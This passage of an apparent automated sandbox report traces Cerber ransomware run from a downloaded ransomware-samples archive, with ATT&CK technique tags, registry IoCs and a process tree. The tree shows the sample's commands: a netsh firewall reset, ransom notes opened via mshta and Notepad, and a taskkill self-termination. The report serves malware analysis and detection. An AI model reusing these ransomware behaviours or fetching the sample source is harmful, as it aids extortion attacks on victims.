Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NOTEPAD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cerber.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2056	PING.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5060	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133672661443548367"	chrome.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings	cerber.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1096	NOTEPAD.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2056	PING.EXE

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
1620	msedge.exe
1620	msedge.exe
1412	msedge.exe
1412	msedge.exe
2636	identity_helper.exe
2636	identity_helper.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1972	msedge.exe
1972	msedge.exe
1920	chrome.exe
1920	chrome.exe
1584	powershell.exe
1584	powershell.exe
1584	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs

pid	Process
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1088	cerber.exe
Token: SeCreatePagefilePrivilege	1088	cerber.exe
Token: SeDebugPrivilege	5060	taskkill.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe
Token: SeCreatePagefilePrivilege	1920	chrome.exe
Token: SeShutdownPrivilege	1920	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1412	msedge.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe
1920	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4480	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1412 wrote to memory of 4788	1412	msedge.exe	83
PID 1412 wrote to memory of 4788	1412	msedge.exe	83
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 368	1412	msedge.exe	84
PID 1412 wrote to memory of 1620	1412	msedge.exe	85
PID 1412 wrote to memory of 1620	1412	msedge.exe	85
PID 1412 wrote to memory of 4824	1412	msedge.exe	86
PID 1412 wrote to memory of 4824	1412	msedge.exe	86
PID 1412 wrote to memory of 4824	1412	msedge.exe	86
PID 1412 wrote to memory of 4824	1412	msedge.exe	86
PID 1412 wrote to memory of 4824	1412	msedge.exe	86
PID 1412 wrote to memory of 4824	1412	msedge.exe	86
PID 1412 wrote to memory of 4824	1412	msedge.exe	86
PID 1412 wrote to memory of 4824	1412	msedge.exe	86
PID 1412 wrote to memory of 4824	1412	msedge.exe	86
PID 1412 wrote to memory of 4824	1412	msedge.exe	86
PID 1412 wrote to memory of 4824	1412	msedge.exe	86
PID 1412 wrote to memory of 4824	1412	msedge.exe	86
PID 1412 wrote to memory of 4824	1412	msedge.exe	86
PID 1412 wrote to memory of 4824	1412	msedge.exe	86
PID 1412 wrote to memory of 4824	1412	msedge.exe	86
PID 1412 wrote to memory of 4824	1412	msedge.exe	86
PID 1412 wrote to memory of 4824	1412	msedge.exe	86
PID 1412 wrote to memory of 4824	1412	msedge.exe	86
PID 1412 wrote to memory of 4824	1412	msedge.exe	86
PID 1412 wrote to memory of 4824	1412	msedge.exe	86

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/kh4sh3i/Ransomware-Samples/archive/refs/heads/main.zip
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb974046f8,0x7ffb97404708,0x7ffb97404718
  2⤵
  PID:4788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,14213000732708205864,6546417199181745679,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
  2⤵
  PID:368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,14213000732708205864,6546417199181745679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,14213000732708205864,6546417199181745679,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:8
  2⤵
  PID:4824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14213000732708205864,6546417199181745679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
  2⤵
  PID:3372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14213000732708205864,6546417199181745679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
  2⤵
  PID:448
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14213000732708205864,6546417199181745679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8
  2⤵
  PID:3024
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14213000732708205864,6546417199181745679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2120,14213000732708205864,6546417199181745679,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4716 /prefetch:8
  2⤵
  PID:5104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14213000732708205864,6546417199181745679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:1
  2⤵
  PID:2772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14213000732708205864,6546417199181745679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
  2⤵
  PID:2848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14213000732708205864,6546417199181745679,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:1
  2⤵
  PID:3332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14213000732708205864,6546417199181745679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
  2⤵
  PID:5116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14213000732708205864,6546417199181745679,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1
  2⤵
  PID:1084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,14213000732708205864,6546417199181745679,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5508 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,14213000732708205864,6546417199181745679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4840 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14213000732708205864,6546417199181745679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1344 /prefetch:1
  2⤵
  PID:2792

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:432

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2816

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3904

C:\Users\Admin\Downloads\Ransomware-Samples-main\Ransomware-Samples-main\Cerber\Ransomware.Cerber\cerber.exe
"C:\Users\Admin\Downloads\Ransomware-Samples-main\Ransomware-Samples-main\Cerber\Ransomware.Cerber\cerber.exe"
1⤵
- Drops startup file
- Drops file in System32 directory
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:1088
- C:\Windows\SysWOW64\netsh.exe
  C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4540
- C:\Windows\SysWOW64\netsh.exe
  C:\Windows\system32\netsh.exe advfirewall reset
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1628
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___WZ8D5QS_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2500
- C:\Windows\SysWOW64\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___EDOXW_.txt
  2⤵
  - System Location Discovery: System Language Discovery
  - Opens file in notepad (likely ransom note)
  PID:1096
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4660
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "cerber.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5060
- - C:\Windows\SysWOW64\PING.EXE
    ping -n 1 127.0.0.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2056

C:\Users\Admin\Downloads\Ransomware-Samples-main\Ransomware-Samples-main\Cerber\Ransomware.Cerber\cerber.exe
"C:\Users\Admin\Downloads\Ransomware-Samples-main\Ransomware-Samples-main\Cerber\Ransomware.Cerber\cerber.exe"
1⤵
PID:4472

C:\Users\Admin\Downloads\Ransomware-Samples-main\Ransomware-Samples-main\Cerber\Ransomware.Cerber\cerber.exe
"C:\Users\Admin\Downloads\Ransomware-Samples-main\Ransomware-Samples-main\Cerber\Ransomware.Cerber\cerber.exe"
1⤵
PID:832

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\9dc876d7423347528332d5f940f0a72f /t 1576 /p 2500
1⤵
PID:3976

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:1920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffb9337cc40,0x7ffb9337cc4c,0x7ffb9337cc58
  2⤵
  PID:1044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,3549687482470712809,4018206417633110462,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1912 /prefetch:2
  2⤵
  PID:4848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2080,i,3549687482470712809,4018206417633110462,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2056 /prefetch:3
  2⤵
  PID:2104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2288,i,3549687482470712809,4018206417633110462,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2468 /prefetch:8
  2⤵
  PID:3700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,3549687482470712809,4018206417633110462,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3172 /prefetch:1
  2⤵
  PID:2024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3276,i,3549687482470712809,4018206417633110462,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3424 /prefetch:1
  2⤵
  PID:3900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,3549687482470712809,4018206417633110462,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4460 /prefetch:1
  2⤵
  PID:808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3724,i,3549687482470712809,4018206417633110462,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4700 /prefetch:1
  2⤵
  PID:3580
- C:\Program Files\Google\Chrome\Application\chrome.exe
